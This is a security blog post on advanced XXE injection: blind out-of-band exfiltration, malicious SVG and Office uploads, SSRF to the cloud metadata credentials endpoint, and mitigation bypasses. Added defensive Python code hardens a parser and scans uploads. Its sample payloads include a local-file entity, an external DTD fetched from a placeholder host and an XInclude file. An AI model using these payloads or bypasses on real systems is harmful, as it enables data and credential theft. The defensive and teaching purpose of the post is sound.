BIPI

XXE Injection Advanced Patterns: Blind Exfiltration, SSRF Chains, and Bypass Techniques

Cybersecurity

XML External Entity injection persists in enterprise applications, API gateways, and document processors. Advanced patterns for blind data exfiltration, out-of-band techniques, and bypassing common XML parser hardening.

By Arjun Raghavan, Security & Systems Lead, BIPI · June 20, 2025 · 10 min read

#xxe #xml-security #ssrf #bug-bounty #exfiltration

XML External Entity injection is routinely dismissed as a solved problem. It is not. Document conversion services, SAML assertion processors, legacy EDI integrations, and PDF generators all consume XML in 2025, and many of them ship with XXE enabled by default. The classic file read via entity reference is well known. The advanced patterns are not.

Classic XXE Recap

The baseline exploit defines an external entity pointing to file:///etc/passwd and references it in the document body. The server parses the entity, substitutes the file contents, and returns them in the response. This works only when the application reflects XML content back in the response and the XML parser has external entity processing enabled.

Blind XXE via Out-of-Band

Most production applications do not reflect XML content in responses. Blind XXE uses out-of-band channels: define an external entity pointing to an attacker-controlled server and embed the file content as a parameter in the URL. The two-step DTD technique builds that URL with parameter entities: one parameter entity reads the file, a second defines the exfiltration entity whose HTTP request URL carries the file content, and the external DTD triggers the request.
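The parser-side mitigation for the classic and the blind variants is the same: never process a DOCTYPE from untrusted input, never parse parameter entities, and never resolve an external entity. The Python below is added here as an illustration and is not code from BIPI or from any parser library's documentation; it builds that policy on the standard-library expat bindings. The three sample documents are constructed, and the host name in the blind sample is a placeholder.

```python
"""Hardened XML parsing for untrusted input, built on Python's expat bindings.

Added example. Policy choices below are assumptions for a document-processing
service, not requirements stated in the article:
  * any DOCTYPE is rejected, so neither internal-subset entity declarations
    nor external DTDs are ever processed (this also removes billion-laughs);
  * parameter entities are never parsed, which defeats the two-step DTD
    technique even if a DOCTYPE somehow reached the parser;
  * external entity references are refused rather than fetched, so the parser
    never issues a file:// or http:// request on the caller's behalf.
"""
import xml.parsers.expat as expat
from xml.etree.ElementTree import Element, TreeBuilder


class UnsafeXMLError(ValueError):
    """Raised when the document carries a DOCTYPE or an entity declaration."""


def parse_untrusted_xml(data: bytes) -> Element:
    """Parse XML bytes into an ElementTree Element, refusing XXE constructs."""
    parser = expat.ParserCreate()
    # Never read parameter entities, internal or external.
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)

    def reject_doctype(name, sysid, pubid, has_internal_subset):
        # Exceptions raised in a handler abort the parse and propagate out of Parse().
        raise UnsafeXMLError(f"DOCTYPE '{name}' is not permitted in untrusted input")

    def reject_entity(name, is_param, value, base, sysid, pubid, notation):
        # Defence in depth: unreachable once DOCTYPEs are rejected, kept anyway.
        raise UnsafeXMLError(f"entity declaration '{name}' is not permitted")

    def refuse_external(context, base, sysid, pubid):
        # Returning 0 makes expat fail the parse instead of resolving sysid.
        return 0

    parser.StartDoctypeDeclHandler = reject_doctype
    parser.EntityDeclHandler = reject_entity
    parser.ExternalEntityRefHandler = refuse_external

    # Assemble a normal Element tree from the element/text callbacks.
    builder = TreeBuilder()
    parser.StartElementHandler = builder.start
    parser.EndElementHandler = builder.end
    parser.CharacterDataHandler = builder.data
    parser.Parse(data, True)
    return builder.close()


def check_document(data: bytes) -> str:
    """Classify a document as 'ok', 'rejected' (XXE construct) or 'malformed'."""
    try:
        parse_untrusted_xml(data)
    except UnsafeXMLError:
        return "rejected"
    except expat.ExpatError:
        return "malformed"
    return "ok"


# Constructed samples: a benign order document and the two payload shapes the
# article describes (classic file entity, blind two-step DTD bootstrap).
CLEAN = b'<?xml version="1.0"?><order><id>42</id><qty>3</qty></order>'
CLASSIC = (b'<?xml version="1.0"?>'
           b'<!DOCTYPE r [<!ENTITY x SYSTEM "file:///etc/passwd">]><r>&x;</r>')
BLIND = (b'<?xml version="1.0"?>'
         b'<!DOCTYPE r [<!ENTITY % dtd SYSTEM "http://placeholder.invalid/x.dtd"> %dtd;]><r/>')

if __name__ == "__main__":
    for label, doc in (("clean", CLEAN), ("classic", CLASSIC), ("blind", BLIND)):
        print(f"{label:8s} -> {check_document(doc)}")
```

Rejecting at the DOCTYPE handler means the decision is made before any entity is declared, so the parser never has to reason about which entity is "external"; the remaining two handlers only matter if a future change re-enables DOCTYPEs for some trusted path.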

XXE via File Upload

SVG, DOCX, XLSX, PPTX, and ODT files all contain XML internally. Upload a crafted SVG with an XXE payload to an avatar upload endpoint. Upload a DOCX where word/document.xml contains the XXE entity. Upload an XLSX where [Content_Types].xml or a relationship file triggers entity resolution. These are particularly effective because the application does not expect XML injection from a file upload endpoint.

XXE to SSRF

External entities support http://, ftp://, and file:// schemes. Using http:// turns XXE directly into SSRF. From the SSRF, reach the AWS metadata endpoint at http://169.254.169.254/latest/meta-data/iam/security-credentials/ to retrieve IAM role credentials. Reach internal services at internal hostnames. The XXE payload is the SSRF transport layer.

Bypassing XXE Mitigations

  • DOCTYPE disabled but XInclude not: use xi:include instead of external entities — different XML feature, often separately configured.
  • External DTD blocked but local DTD allowed: use parameter entities that reference a known local DTD file and redefine an entity within it.
  • Entity expansion blocked: use parameter entities inside the DOCTYPE internal subset, which some parsers allow even when external entities are blocked.
  • Input sanitised before parsing: look for second-order processing where the stored XML is later parsed by a different, less hardened parser.
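Because the file-upload vector hides the XML inside an archive and the XInclude bypass avoids entity syntax altogether, a pre-parse scan of every XML part is a useful second control beside a hardened parser. The Python below is added here and is not BIPI's tooling: it opens an uploaded Office-style archive, inspects each XML part (including [Content_Types].xml and the .rels files) for DOCTYPE, entity declarations, parameter-entity references and XInclude markers, and does the same for a raw SVG. The archive, the SVG and the size limit are constructed for the example; the external DTD host in the sample is a placeholder.

```python
"""Pre-parse scan of uploaded XML, SVG and Office archives for XXE markers.

Added example; the archive and SVG below are constructed. The scan is a
gate in front of the parser, not a replacement for hardening the parser.
"""
import io
import re
import zipfile
from typing import Dict, List

MAX_PART_BYTES = 5 * 1024 * 1024  # assumed limit: do not inflate huge parts

# XML keywords are case-sensitive, so exact-case patterns are sufficient.
MARKERS = {
    "doctype": re.compile(r"<!DOCTYPE\b"),
    "entity_decl": re.compile(r"<!ENTITY\b"),
    "param_entity_ref": re.compile(r"%[A-Za-z_][\w.-]*;"),
    "xinclude": re.compile(r"www\.w3\.org/200[13]/XInclude|<xi:include\b"),
}
UTF16_BOMS = (b"\xff\xfe", b"\xfe\xff")


def _decode(data: bytes) -> str:
    """Decode defensively: a UTF-16 part would slip past a plain byte search."""
    if data[:2] in UTF16_BOMS:
        return data.decode("utf-16", errors="replace")
    if data[:2] == b"<\x00":
        return data.decode("utf-16-le", errors="replace")
    if data[:2] == b"\x00<":
        return data.decode("utf-16-be", errors="replace")
    return data.decode("utf-8-sig", errors="replace")


def scan_xml_bytes(data: bytes) -> List[str]:
    """Return the sorted list of marker names found in one XML document."""
    text = _decode(data)
    return sorted(name for name, rx in MARKERS.items() if rx.search(text))


def _looks_like_xml(name: str, head: bytes) -> bool:
    """Select parts by extension or by content so renamed parts are not skipped."""
    if name.lower().endswith((".xml", ".rels", ".svg")):
        return True
    return head.lstrip()[:1] == b"<" or head[:2] in UTF16_BOMS


def scan_office_archive(blob: bytes) -> Dict[str, List[str]]:
    """Scan every XML-like member of a DOCX/XLSX/PPTX/ODT-style zip archive."""
    findings: Dict[str, List[str]] = {}
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            if info.file_size > MAX_PART_BYTES:
                findings[info.filename] = ["oversized_part"]
                continue
            data = zf.read(info.filename)
            if not _looks_like_xml(info.filename, data[:64]):
                continue
            hits = scan_xml_bytes(data)
            if hits:
                findings[info.filename] = hits
    return findings


def build_sample_docx() -> bytes:
    """Constructed DOCX-like archive whose word/document.xml carries a DOCTYPE."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml",
                    '<?xml version="1.0"?><Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        zf.writestr("word/_rels/document.xml.rels",
                    '<?xml version="1.0"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"/>')
        zf.writestr("word/document.xml",
                    '<?xml version="1.0"?>'
                    '<!DOCTYPE w [<!ENTITY % ext SYSTEM "http://placeholder.invalid/x.dtd"> %ext;]>'
                    '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"><w:body/></w:document>')
        zf.writestr("word/media/image1.png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 16)
    return buf.getvalue()


# Constructed SVG using XInclude instead of an entity (the first bypass above).
SAMPLE_SVG = (b'<svg xmlns="http://www.w3.org/2000/svg" xmlns:xi="http://www.w3.org/2001/XInclude">'
              b'<xi:include href="placeholder.txt" parse="text"/></svg>')

if __name__ == "__main__":
    print("docx:", scan_office_archive(build_sample_docx()))
    print("svg:", scan_xml_bytes(SAMPLE_SVG))
```

The content-based selection and the UTF-16 handling are there because both an unexpected member name and a non-UTF-8 encoding would otherwise let a part through unscanned; the size cap keeps a decompression bomb from turning the scanner itself into the outage.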

Testing Methodology

Systematically find every point where the application processes XML: SOAP endpoints, REST endpoints accepting application/xml, file upload endpoints, webhook receivers, and API integrations. For each, send a DOCTYPE declaration and observe whether the server errors differently than without one. A differential response indicates the DOCTYPE was parsed. Follow with an OOB payload pointing to Burp Collaborator.

  • Top 5: OWASP API Security ranking for XXE in enterprise API assessments 2024
  • 73%: of XXE bugs found in bug bounty programs came from file upload endpoints
  • Pre-auth: severity level of XXE in SAML processors — no authentication required to exploit
